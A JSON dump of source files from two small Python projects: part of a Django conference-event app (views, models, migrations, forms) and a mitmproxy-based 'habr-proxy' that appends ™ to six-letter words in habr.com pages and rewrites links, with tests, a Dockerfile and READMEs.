\\\"{v}\\\"' for k, v in kwars.items())\n return HttpResponse(html)\n\n\nclass SearchView(View):\n def get(self, request):\n name = self.request.GET.get('q', '')\n e_type = int(self.request.GET.get('type', '-1'))\n city = int(self.request.GET.get('city', '-1'))\n\n query = {}\n if name:\n query['name__icontains'] = name\n if e_type != -1:\n query['type__id'] = e_type\n if city != -1:\n query['localization__id'] = city\n\n return render(request, 'content/search.html', {\n 'events': Event.objects.filter(**query)\n })\n\n\nclass TicketOwnedView(View):\n def get(self, request: HttpRequest):\n return render(request, 'content/ticketOwned.html')\n\n def post(self, request: HttpRequest):\n keys = ['name', 'type', 'city']\n kwars = {key: request.POST[key] for key in keys}\n html = \"\\n\".join(f'<p>{k}: \\\"{v}\\\"' for k, v in kwars.items())\n return HttpResponse(html)\n\n\nclass YourEventsView(View):\n def get(self, request: HttpRequest):\n context = {\n 'events': Event.objects.all()\n }\n return render(request, 'content/yourEvents.html', context)\n\n def post(self, request: HttpRequest):\n keys = ['name', 'type', 'city']\n kwars = {key: request.POST[key] for key in keys}\n html = \"\\n\".join(f'<p>{k}: \\\"{v}\\\"' for k, v in kwars.items())\n return HttpResponse(html)\n\n\nclass EventsToAcceptView(View):\n def get(self, request: HttpRequest):\n return render(request, 'content/eventsToAccept.html')\n\n def post(self, request: HttpRequest):\n keys = ['name', 'type', 'city']\n kwars = {key: request.POST[key] for key in keys}\n html = \"\\n\".join(f'<p>{k}: \\\"{v}\\\"' for k, v in kwars.items())\n return HttpResponse(html)\n\n\nclass eventPreviewView(View):\n def get(self, request: HttpRequest):\n return render(request, 'content/eventPreview.html')\n\n def post(self, request: HttpRequest):\n keys = ['name', 'type', 'city']\n kwars = {key: request.POST[key] for key in keys}\n html = \"\\n\".join(f'<p>{k}: \\\"{v}\\\"' for k, v in kwars.items())\n return HttpResponse(html)\n\n\nclass buyHowManyView(View):\n def get(self, request: HttpRequest):\n return render(request, 'content/buyHowMany.html')\n\n\nclass buyWhatView(View):\n def get(self, request: HttpRequest):\n return render(request, 'content/buyWhat.html')\n\n\nclass transactionView(View):\n def get(self, request: HttpRequest):\n return render(request, 'content/transaction.html')\n\n\nclass 
AddEventView(FormView):\n form_class = AddEventForm\n template_name = 'content/addevent.html'\n success_url = reverse_lazy('home')\n\n def form_valid(self, form: form_class):\n Event.objects.create(**form.cleaned_data)\n return super().form_valid(form)\n"
},
{
"alpha_fraction": 0.5877318382263184,
"alphanum_fraction": 0.6148359775543213,
"avg_line_length": 28.20833396911621,
"blob_id": "292616b792582c79839ed57b5ea6318fde20fb28",
"content_id": "ea1c94d54dbe2d50006e3b4188bb3d46e3ed541b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 702,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 24,
"path": "/content/migrations/0002_auto_20210124_0112.py",
"repo_name": "mateuszgrzyb/confexplore",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.1.5 on 2021-01-24 00:12\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('content', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='event',\n name='localization',\n field=models.ForeignKey(default='Warszawa', on_delete=django.db.models.deletion.CASCADE, to='content.city'),\n ),\n migrations.AlterField(\n model_name='event',\n name='type',\n field=models.ForeignKey(default='Ogólna', on_delete=django.db.models.deletion.CASCADE, to='content.type'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6836734414100647,
"alphanum_fraction": 0.6938775777816772,
"avg_line_length": 29.799999237060547,
"blob_id": "1772d566f0eb439958f6f6199a3aded555a9ec18",
"content_id": "5bfbc45a38e1cb408f5211534a256229dca0ffc0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1080,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 35,
"path": "/content/models.py",
"repo_name": "mateuszgrzyb/confexplore",
"src_encoding": "UTF-8",
"text": "from django.db import models\n\n# Create your models here.\nfrom users.models import NormalUser\n\n\nclass City(models.Model):\n name = models.CharField(max_length=50, default='Warszawa')\n\n def __str__(self):\n return self.name\n\n\nclass Type(models.Model):\n name = models.CharField(max_length=100, default='Ogólna')\n\n def __str__(self):\n return self.name\n\n\nclass Event(models.Model):\n # class Schedule(models.Model):\n # event = models.ForeignKey('Event', on_delete=models.CASCADE)\n # date = models.DateTimeField()\n\n name = models.CharField(max_length=100, default='konferencja')\n info = models.TextField(blank=True)\n localization = models.ForeignKey('City', on_delete=models.CASCADE, default=\"Warszawa\")\n type = models.ForeignKey('Type', on_delete=models.CASCADE, default=\"Ogólna\")\n date = models.CharField(max_length=30, default='1 stycznia')\n\n\nclass Ticket(models.Model):\n event = models.ForeignKey(Event, on_delete=models.CASCADE)\n owner = models.ManyToManyField(NormalUser, blank=True, related_name='tickets')\n"
},
{
"alpha_fraction": 0.597484290599823,
"alphanum_fraction": 0.601257860660553,
"avg_line_length": 26.241378784179688,
"blob_id": "c0f64181a8e4a2cee101d02fdec3682d121ede33",
"content_id": "aed69c1a55d4beb66fa36dbfc3487e9453a078d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 796,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 29,
"path": "/users/forms.py",
"repo_name": "mateuszgrzyb/confexplore",
"src_encoding": "UTF-8",
"text": "# from django.contrib.auth.forms import UserCreationForm\n# from users.models import NormalUser\n# class RegistrationForm(UserCreationForm):\n#\n# class Meta:\n# model = User\n# fields = [\n# 'username',\n# 'email',\n# 'password1',\n# 'password2',\n# ]\n#\nfrom django import forms\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserCreationForm\n\nROLE =( \n (\"1\", \"Uczestnik\"), \n (\"2\", \"Wolontariusz\"), \n (\"3\", \"Organizator\"), \n)\n\nclass UserRegisterForm(UserCreationForm):\n email = forms.EmailField()\n rodzaj_użytkownika = forms.ChoiceField(choices = ROLE)\n class Meta:\n model = User\n fields = ['username', 'email', 'password1', 'password2','rodzaj_użytkownika']\n \n"
},
{
"alpha_fraction": 0.5452784299850464,
"alphanum_fraction": 0.5598062872886658,
"avg_line_length": 37.96226501464844,
"blob_id": "5e82fc0cee795c63337b6d382d55e39aaa4b70a6",
"content_id": "51c36b0f8caae30f9c5de61e90bfee26600fe61a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2066,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 53,
"path": "/content/migrations/0001_initial.py",
"repo_name": "mateuszgrzyb/confexplore",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.1.5 on 2021-01-24 00:10\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ('users', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='City',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(default='Warszawa', max_length=50)),\n ],\n ),\n migrations.CreateModel(\n name='Event',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(default='konferencja', max_length=100)),\n ('info', models.TextField(blank=True)),\n ('date', models.CharField(default='1 stycznia', max_length=30)),\n ('localization', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='content.city')),\n ],\n ),\n migrations.CreateModel(\n name='Type',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(default='Ogólna', max_length=100)),\n ],\n ),\n migrations.CreateModel(\n name='Ticket',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('event', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='content.event')),\n ('owner', models.ManyToManyField(blank=True, related_name='tickets', to='users.NormalUser')),\n ],\n ),\n migrations.AddField(\n model_name='event',\n name='type',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='content.type'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5280575752258301,
"alphanum_fraction": 0.5553956627845764,
"avg_line_length": 23.821428298950195,
"blob_id": "8a8f23a17b5f533e7070704c888dbf71e35973f3",
"content_id": "b0b66f80165be862277e5bcdec6eea5a488d886a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 695,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 28,
"path": "/users/migrations/0002_auto_20210124_2053.py",
"repo_name": "mateuszgrzyb/confexplore",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.1.4 on 2021-01-24 20:53\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('users', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='normaluser',\n name='blocked',\n field=models.BooleanField(default=False),\n ),\n migrations.AddField(\n model_name='organizer',\n name='blocked',\n field=models.BooleanField(default=False),\n ),\n migrations.AddField(\n model_name='volunteer',\n name='blocked',\n field=models.BooleanField(default=False),\n ),\n ]\n"
}
] | 8 |
g1r0/habr-proxy | https://github.com/g1r0/habr-proxy | 9e6434e1292172ff9198c93087a7c47fd5cf7988 | 752a6308ba795db92d39d50a5cdd565615b7ef5d | c18ac4d05ef72fdd5c412a2218707db789b520cc | refs/heads/master | 2020-04-03T15:33:48.971244 | 2018-11-03T03:42:25 | 2018-11-03T03:42:25 | 155366946 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6414473652839661,
"alphanum_fraction": 0.6422697305679321,
"avg_line_length": 26.0222225189209,
"blob_id": "121895fbda33e3a2d6eaf740210664412cb5e473",
"content_id": "a94416dc60f36da72cba95d9e751b817dc0175c5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1216,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 45,
"path": "/src/server.py",
"repo_name": "g1r0/habr-proxy",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nimport os\n\nfrom mitmproxy import options\nfrom mitmproxy.tools.dump import DumpMaster\nfrom mitmproxy.tools.main import cmdline\nfrom mitmproxy.tools.main import run\n\nfrom habr_proxy.addons import ModifyHTMLContent\nfrom habr_proxy.modifiers import HTMLModificationManager\nfrom habr_proxy.modifiers import TmTransformHtmlAction\nfrom habr_proxy.modifiers import UrlTransformHtmlAction\n\n\nCONFIG_DIR_VAR = 'PROXY_CONFIG_DIR'\n\nCONFIG_PATH = os.environ.get(CONFIG_DIR_VAR, None)\nif CONFIG_PATH is None:\n raise ValueError(\n 'Environment variable %s not found.' % CONFIG_DIR_VAR\n )\n\n\nclass HabrDumpMaster(DumpMaster):\n\n \"\"\"Mitmdump mainloop object for habr-proxy.\"\"\"\n\n def __init__(self, opts: options.Options) -> None:\n \"\"\"Initialize extra addons.\"\"\"\n super().__init__(opts)\n\n self.addons.add(\n ModifyHTMLContent(\n manager=HTMLModificationManager(\n actions=(\n TmTransformHtmlAction,\n UrlTransformHtmlAction,\n )\n )\n )\n )\n\n\nif __name__ == \"__main__\":\n proxy = run(HabrDumpMaster, cmdline.mitmdump, ('--confdir', CONFIG_PATH))\n"
},
{
"alpha_fraction": 0.6291946172714233,
"alphanum_fraction": 0.6560402512550354,
"avg_line_length": 17.625,
"blob_id": "f5eda532c5ae7a9fbaeb7bb245a872343ed76a33",
"content_id": "2f4c5bdfb157ba21d99595d91b841ff947f41e5a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 1192,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 64,
"path": "/README.rst",
"repo_name": "g1r0/habr-proxy",
"src_encoding": "UTF-8",
"text": "About\n_________________\n\nHabr-proxy project has been done for the `test challenge #1\n<https://github.com/ivelum/job/blob/master/code_challenges/python.md>`_.\n\nAssumptions\n_________________\n\n* Service will be run locally. No remotes.\n* Proxy is available at ``http://127.0.0.1:8080``.\n* Demo can be run with local environment or docker image.\n\nWhat was used\n_________________\n\n* Python 3.6\n* Mitmproxy\n* Docker\n* Pytest\n\nHow to run demo\n_________________\n\nDocker\n~~~~~~~\nInstructions for docker-powered demo can be found at ``docker/README.rst``.\n\nLocal python environment\n~~~~~~~~~~~~~~~~~~~~~~~~~\n1. Setup Python 3.6 environment and install dependencies for ``requirements/prod.txt``:\n\n::\n\n pip install -r requirements/prod.txt\n\n2. Set environment variable **PROXY_CONFIG_DIR** pointing to directory with ``config.yaml``.\n\n::\n\n export PROXY_CONFIG_DIR=/path/to/config_dir\n\n3. Run server with command:\n\n::\n\n python src/server.py\n\nProxy is now available at ``http://127.0.0.1:8080``.\n\nHow to run tests\n________________\n1. Setup Python 3.6 environment and install dependencies for ``requirements/prod.txt``:\n\n::\n\n pip install -r requirements/prod.txt\n\n\n2. Run Pytest with command:\n\n::\n\n pytest\n"
},
{
"alpha_fraction": 0.4365079402923584,
"alphanum_fraction": 0.5317460298538208,
"avg_line_length": 15.800000190734863,
"blob_id": "cd94c5ebb4fc03523a8c29495ce1b62dd03c642c",
"content_id": "016bba8d43234dc94eceb88c21a4045d6ff00433",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 252,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 15,
"path": "/docker/README.rst",
"repo_name": "g1r0/habr-proxy",
"src_encoding": "UTF-8",
"text": "Building image\n--------------------------\n\n::\n\n docker build -t habr_proxy -f docker/Dockerfile .\n\nRunning demo\n--------------------------\n\n::\n\n docker run -it -p 127.0.0.1:8080:8080 habr_proxy\n\nService is now available at ``http://127.0.0.1:8080``.\n"
},
{
"alpha_fraction": 0.6481481194496155,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 26,
"blob_id": "f14ae81cafce2973b24f3d0a69f58522905ec17c",
"content_id": "47d9281479d77f5c8bb1fdcf5c0bb174a5c778d6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 54,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 2,
"path": "/src/habr_proxy/__init__.py",
"repo_name": "g1r0/habr-proxy",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\n\"\"\"Habr-proxy addons for mitmdump.\"\"\"\n"
},
{
"alpha_fraction": 0.4406392574310303,
"alphanum_fraction": 0.46518266201019287,
"avg_line_length": 29.736841201782227,
"blob_id": "062a77f5d30246b0fe9f59df69bfc2b0a8ff83cc",
"content_id": "dbeeff3bdc071c921dd6cfce4d5fe74f642ec0aa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 1752,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 57,
"path": "/docker/Dockerfile",
"repo_name": "g1r0/habr-proxy",
"src_encoding": "UTF-8",
"text": "FROM ubuntu:16.04\n\nENV LANG ru_RU.utf8\nENV PROXY_CONFIG_DIR /usr/src/app/config\n\nRUN set -ex \\\n # -------------------------------------------------------------------------\n # Installing required system packages.\n && apt-get update \\\n && DEBIAN_FRONTEND=noninteractive \\\n apt-get install --no-install-recommends --yes \\\n ca-certificates \\\n language-pack-ru \\\n wget \\\n g++ \\\n libpq-dev \\\n libssl-dev \\\n libffi-dev \\\n libxml2-dev \\\n libxslt1-dev \\\n libxmlsec1-dev \\\n libreadline-dev \\\n libbz2-dev \\\n && apt autoremove \\\n && apt-get clean \\\n && rm -rf /var/lib/apt/lists/* \\\n # -------------------------------------------------------------------------\n # Installing Python 3.6.5.\n && mkdir -p /usr/local/python/3.6 \\\n && cd /tmp \\\n && wget https://www.python.org/ftp/python/3.6.5/Python-3.6.5.tar.xz \\\n && tar -xJf Python-3.6.5.tar.xz \\\n && rm Python-3.6.5.tar.xz \\\n && cd Python-3.6.5 \\\n && ./configure \\\n --prefix=/usr/local/python/3.6 \\\n && make \\\n && make install \\\n && cd \\\n && rm -r /tmp/Python-3.6.5 \\\n && ln -s /usr/local/python/3.6/bin/python3.6 /usr/bin/python \\\n && ln -s /usr/local/python/3.6/bin/pip3 /usr/bin/pip \\\n && export PATH=/usr/local/python/3.6/bin:$PATH \\\n # -------------------------------------------------------------------------\n # Create project dir.\n && mkdir -p /usr/src/app\n\n\nWORKDIR /usr/src/app\nCOPY . .\n\nRUN set -ex \\\n # -------------------------------------------------------------------------\n # Installing environment requirements.\n && pip install --no-cache-dir -r requirements/prod.txt\n\nENTRYPOINT python /usr/src/app/src/server.py\n"
},
{
"alpha_fraction": 0.47595328092575073,
"alphanum_fraction": 0.4802473485469818,
"avg_line_length": 33.2470588684082,
"blob_id": "157ccb2ae13b9d0d7b0d421af01f15c4b9e9990a",
"content_id": "7fcbef2c06639576bf8a222895172d0f77ae0de7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5940,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 170,
"path": "/tests/test_transform_actions.py",
"repo_name": "g1r0/habr-proxy",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nfrom typing import Iterable\nfrom typing import Tuple\nfrom typing import Type\n\nfrom src.habr_proxy.modifiers import BaseTransformAction\nfrom src.habr_proxy.modifiers import TmTransformHtmlAction\nfrom src.habr_proxy.modifiers import UrlTransformHtmlAction\n\n\ndef verify_test_data(\n action: Type[BaseTransformAction],\n data: Iterable[Tuple[str, str]]\n) -> None:\n \"\"\"Verify data combinations using extra spaces.\"\"\"\n for input_data, expected_result in data:\n assert action(input_data).transform() == expected_result\n\n # also try combinations with extra spaces\n input_data = ' ' + input_data\n expected_result = ' ' + expected_result\n assert action(input_data).transform() == expected_result\n\n input_data = input_data + ' '\n expected_result = expected_result + ' '\n assert action(input_data).transform() == expected_result\n\n input_data = ' ' + input_data + ' '\n expected_result = ' ' + expected_result + ' '\n assert action(input_data).transform() == expected_result\n\n\nclass TestTmTransform:\n\n \"\"\"Check transformations for 6-letter words with ™ mark.\"\"\"\n\n action = TmTransformHtmlAction\n\n def test_word_rule(self) -> None:\n \"\"\"Check single 6-letter word transformation.\"\"\"\n test_sets = (\n ('change', 'change™'),\n ('nochange', 'nochange'),\n ('nochangenochange', 'nochangenochange'),\n ('Семёно', 'Семёно™'),\n ('ch1nge', 'ch1nge'),\n\n # enclosing literals\n ('(change)', '(change™)'),\n ('\"change\"', '\"change™\"'),\n ('”change”', '”change™”'),\n (\"'change'\", \"'change™'\"),\n ('`change`', '`change™`'),\n ('[change]', '[change™]'),\n ('{change}', '{change™}'),\n ('[change/change]', '[change™/change™]'),\n (r'[change\\change]', r'[change™\\change™]'),\n ('«change»', '«change™»'),\n ('« change »', '« change™ »'),\n\n # delimiters\n ('noedit-nochange', 'noedit-nochange'),\n ('noedit@nochange', 'noedit@nochange'),\n # .\n ('noedit.nochange', 'noedit.nochange'),\n ('change. nochange', 'change™. 
nochange'),\n ('change.<nochange>', 'change™.<nochange>'),\n # ,\n ('noedit,nochange', 'noedit,nochange'),\n ('change, nochange', 'change™, nochange'),\n ('change,<nochange>', 'change™,<nochange>'),\n # :\n ('noedit:nochange', 'noedit:nochange'),\n ('change: nochange', 'change™: nochange'),\n ('change:<nochange>', 'change™:<nochange>'),\n # ;\n ('noedit;nochange', 'noedit;nochange'),\n ('change; nochange', 'change™; nochange'),\n ('change;<nochange>', 'change™;<nochange>'),\n )\n\n verify_test_data(action=self.action, data=test_sets)\n\n def test_tag_definitions(self) -> None:\n \"\"\"Check no content changed in tag definitions (between <>).\"\"\"\n test_sets = (\n ('<noedit>', '<noedit>'),\n ('< noedit >', '< noedit >'),\n ('</noedit >', '</noedit >'),\n ('</ noedit>', '</ noedit>'),\n (\n 'change<noedit>change<noedit/ noedit > Семёно',\n 'change™<noedit>change™<noedit/ noedit > Семёно™',\n ),\n (\n 'change< noedit noedit>change<noedit/ noedit > Семёно',\n 'change™< noedit noedit>change™<noedit/ noedit > Семёно™',\n ),\n )\n\n verify_test_data(action=self.action, data=test_sets)\n\n def test_excluded_tags(self) -> None:\n \"\"\"Check no content is modified in excluded tags.\"\"\"\n test_sets = (\n (\n '<noedit>change<script noedit>noedit< /script>< /noedit>',\n '<noedit>change™<script noedit>noedit< /script>< /noedit>',\n ),\n (\n '''<noedit>change\n < iframe noedit>\n noedit\n <script noedit>\n noedit\n < /script>\n noedit\n </iframe>change\n < /noedit>''',\n '''<noedit>change™\n < iframe noedit>\n noedit\n <script noedit>\n noedit\n < /script>\n noedit\n </iframe>change™\n < /noedit>''',\n ),\n )\n\n verify_test_data(action=self.action, data=test_sets)\n\n\nclass PinnedUrlTransformHtmlAction(UrlTransformHtmlAction):\n\n @staticmethod\n def _get_replace_url() -> str:\n \"\"\"Pin replace URL string for test.\"\"\"\n return 'http://127.0.0.1:8080'\n\n\nclass TestUrlTransform:\n\n \"\"\"Check URL transformations for <a> tags.\"\"\"\n\n action = PinnedUrlTransformHtmlAction\n\n def test_url_replace(self) -> None:\n \"\"\"Check url transformation within <a> tag.\"\"\"\n test_sets = (\n (\n '''<li>\n <a href=\"https://habr.com/company/yandex/\"\n onclick=\"https://habr.com/company/yandex/\"\n rel=\"nofollow\">\n https://habr.com/company/yandex/\n </a>\n </li>''',\n '''<li>\n <a href=\"http://127.0.0.1:8080/company/yandex/\"\n onclick=\"https://habr.com/company/yandex/\"\n rel=\"nofollow\">\n https://habr.com/company/yandex/\n </a>\n </li>''',\n ),\n )\n\n verify_test_data(action=self.action, data=test_sets)\n"
},
{
"alpha_fraction": 0.6688172221183777,
"alphanum_fraction": 0.6741935610771179,
"avg_line_length": 32.21428680419922,
"blob_id": "4d1d1a2aeeb0cc39a5c284041cb368335218d39c",
"content_id": "fb6b52db5f27a569ef3c5f2bb99e9078bccd921d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 930,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 28,
"path": "/src/habr_proxy/addons.py",
"repo_name": "g1r0/habr-proxy",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nfrom mitmproxy import ctx\nfrom mitmproxy.net.http import parse_content_type\nfrom mitmproxy.utils import human\nimport mitmproxy\n\nfrom habr_proxy.modifiers import BaseModificationManager\n\n\nclass ModifyHTMLContent:\n\n \"\"\"Mitmdump scenario for HTML content modification.\"\"\"\n\n def __init__(self, manager: BaseModificationManager) -> None: # noqa: D107\n super().__init__()\n self.manager = manager\n\n def response(self, flow: mitmproxy.http.HTTPFlow):\n \"\"\"Response processing.\n\n Full HTTP response has already been read here.\n \"\"\"\n ident = (len(human.format_address(flow.client_conn.address)) - 2)\n\n if 'html' in parse_content_type(flow.response.headers['Content-type']):\n modified_content = self.manager.process(flow.response.text)\n flow.response.text = modified_content\n ctx.log.info(f'{\" \" * ident} << HTML modification done.')\n"
},
{
"alpha_fraction": 0.5970606207847595,
"alphanum_fraction": 0.6027250289916992,
"avg_line_length": 29.101383209228516,
"blob_id": "e18af86b2d6212b13cccb89be652fed6cfec3330",
"content_id": "a11b500f5668292c2ac8f04f0f42cb5b29a7805b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6546,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 217,
"path": "/src/habr_proxy/modifiers.py",
"repo_name": "g1r0/habr-proxy",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nfrom abc import ABCMeta\nfrom abc import abstractmethod\nfrom operator import methodcaller\nfrom typing import Any\nfrom typing import AnyStr\nfrom typing import Iterable\nfrom typing import List\nfrom typing import Match\nfrom typing import Pattern\nfrom typing import Type\nimport re\n\nfrom mitmproxy import ctx\n\n\ndef get_tm_transform_re() -> Pattern[AnyStr]:\n \"\"\"Get compiled Tm transformation regex.\"\"\"\n # base rule for 6-letter word\n word = r'([^\\W\\d_]{6})'\n\n # negative look ahead\n delimiters = r'.,:;'\n close_literals = r'\\)\\]\\}\\'\\”\\\"`»/\\\\'\n\n word_continue = f'[^\\\\s<{close_literals}{delimiters}]+'\n close_tag = r'[^<]*?>'\n word_delimiter = f'[{delimiters}][^\\\\s<]+'\n negative_ahead = f'(?!{word_continue}|{close_tag}|{word_delimiter})'\n\n # negative look behind\n open_literals = r'\\(\\[\\{\\'\\”\\\"`«/\\\\'\n\n word_begin = f'[^\\\\s>{open_literals}]{{1}}'\n open_tag = r'<'\n negative_behind = f'(?<!{word_begin}|{open_tag})'\n\n return re.compile(f'{negative_behind}{word}{negative_ahead}', re.DOTALL)\n\n\nclass BaseTransformAction(metaclass=ABCMeta):\n\n \"\"\"Base action class for content transformation.\"\"\"\n\n def __init__(self, content: Any) -> None: # noqa: D107\n super().__init__()\n self.content = content\n\n @abstractmethod\n def transform(self) -> Any:\n \"\"\"Abstract method to define data change.\"\"\"\n raise NotImplementedError()\n\n\nclass BaseTransformHtmlAction(BaseTransformAction):\n\n \"\"\"Base action class for HTML content transformation.\"\"\"\n\n @abstractmethod\n def transform(self) -> str:\n \"\"\"Abstract method to define data change.\"\"\"\n raise NotImplementedError()\n\n @staticmethod\n def _get_paired_tag_re(tag: str) -> Pattern[AnyStr]:\n \"\"\"Build paired tag regex.\"\"\"\n regex = r'(<[\\s]*placeholder[^>]*>.*?<[\\s]*?/placeholder[\\s]*?>)'\n regex = regex.replace('placeholder', tag, 2)\n\n return re.compile(regex, re.DOTALL)\n\n @staticmethod\n def _remove_intersected_matches(\n matches: List[Match[AnyStr]]) -> List[Match[AnyStr]]:\n \"\"\"Ensure tag's regex matches not to be intersected.\"\"\"\n if len(matches) < 2:\n return matches\n\n key_func = methodcaller('start', 0)\n matches.sort(key=key_func)\n\n not_intersected_matches = [matches[0]]\n for i in range(1, len(matches)):\n if matches[i].start(0) > matches[i-1].end(0):\n not_intersected_matches.append(matches[i])\n\n return not_intersected_matches\n\n\nclass TmTransformHtmlAction(BaseTransformHtmlAction):\n\n \"\"\"Transformation scenario for 6-letter words with ™ mark.\n\n :Example: python -> python™\n \"\"\"\n\n transform_re = get_tm_transform_re()\n\n # paired tags with content to be excluded from transformations\n excluded_tags = ('script', 'iframe')\n\n def __init__(self, content: str) -> None: # noqa: D107\n super().__init__(content)\n self.excluded_matches = []\n self._collect_excluded_tags()\n self.excluded_matches = self._remove_intersected_matches(\n self.excluded_matches)\n\n def _collect_excluded_tags(self) -> None:\n \"\"\"Gather skipped tag's match objects.\"\"\"\n self.excluded_matches = []\n for tag in self.excluded_tags:\n tag_re = self._get_paired_tag_re(tag=tag)\n match_objects = tag_re.finditer(self.content)\n self.excluded_matches.extend(match_objects)\n\n def transform(self) -> str:\n \"\"\"Modify words of HTML content.\"\"\"\n def word_tm(match_object):\n \"\"\"Change word -> word™.\"\"\"\n word = match_object.group(0)\n\n return word + '™'\n\n result = []\n start_index = 0\n for match in self.excluded_matches:\n 
transformable_substring = self.content[start_index:match.start(0)]\n result.extend((\n self.transform_re.sub(word_tm, transformable_substring),\n match.group(0)\n ))\n start_index = match.end(0)\n\n transformable_substring = self.transform_re.sub(\n word_tm, self.content[start_index:])\n result.append(transformable_substring)\n\n return ''.join(result)\n\n\nclass UrlTransformHtmlAction(BaseTransformHtmlAction):\n\n \"\"\"Transformation scenario for URL links to point on HabrProxy.\"\"\"\n\n url_re = re.compile(r'(?<=href=\")(https://habr.com)')\n\n def __init__(self, content: str) -> None:\n \"\"\"Initialize action with parsed HTML content.\"\"\"\n super().__init__(content)\n self.link_matches = None\n self._collect_links()\n\n def _collect_links(self) -> None:\n \"\"\"Gather <a></a> tag match objects.\"\"\"\n self.link_matches = []\n tag_re = self._get_paired_tag_re(tag='a')\n match_objects = tag_re.finditer(self.content)\n self.link_matches.extend(match_objects)\n\n def transform(self) -> str:\n \"\"\"Modify links in HTML content to stay at habr-proxy.\"\"\"\n replace_str = self._get_replace_url()\n\n result = []\n start_index = 0\n for match in self.link_matches:\n constant_substring = self.content[start_index:match.start(0)]\n result.extend((\n constant_substring,\n self.url_re.sub(replace_str, match.group(0))\n ))\n start_index = match.end(0)\n\n constant_substring = self.content[start_index:]\n result.append(constant_substring)\n\n return ''.join(result)\n\n @staticmethod\n def _get_replace_url() -> str:\n \"\"\"Collect replace url from config.\"\"\"\n options = dict(ctx.options.items())\n port = options['listen_port']\n replace_str = f'http://127.0.0.1:{port.value}'\n\n return replace_str\n\n\nclass BaseModificationManager(metaclass=ABCMeta):\n\n \"\"\"Base manager class for content modification.\"\"\"\n\n @abstractmethod\n def process(self, content: Any) -> Any:\n \"\"\"Abstract method to process data content.\"\"\"\n raise NotImplementedError()\n\n\nclass HTMLModificationManager(BaseModificationManager):\n\n \"\"\"HTML content modification manager.\"\"\"\n\n def __init__(\n self,\n actions: Iterable[Type[BaseTransformAction]]\n ) -> None: # noqa: D107\n super().__init__()\n self.actions = actions\n\n def process(self, content: str) -> str:\n \"\"\"Run series of transformations on HTML content.\"\"\"\n for action in self.actions:\n step = action(content)\n content = step.transform()\n\n return content\n"
}
] | 8 |
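The record above builds elaborate look-behind/look-ahead rules so that the ™ mark is only appended to standalone six-letter words outside of tags and delimiters. A minimal sketch of that core substitution, with the boundary rules simplified to plain `\b` word boundaries (everything here is illustrative, not part of the repository):

```python
import re

# Simplified stand-in for get_tm_transform_re(): six consecutive letters,
# delimited by plain word boundaries instead of the record's look-arounds.
SIX_LETTER_WORD = re.compile(r'\b([^\W\d_]{6})\b')

def add_tm(text: str) -> str:
    """Append a trademark sign to every standalone six-letter word."""
    return SIX_LETTER_WORD.sub(lambda m: m.group(0) + '\u2122', text)

print(add_tm('python is spoken here'))  # -> python™ is spoken™ here
```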
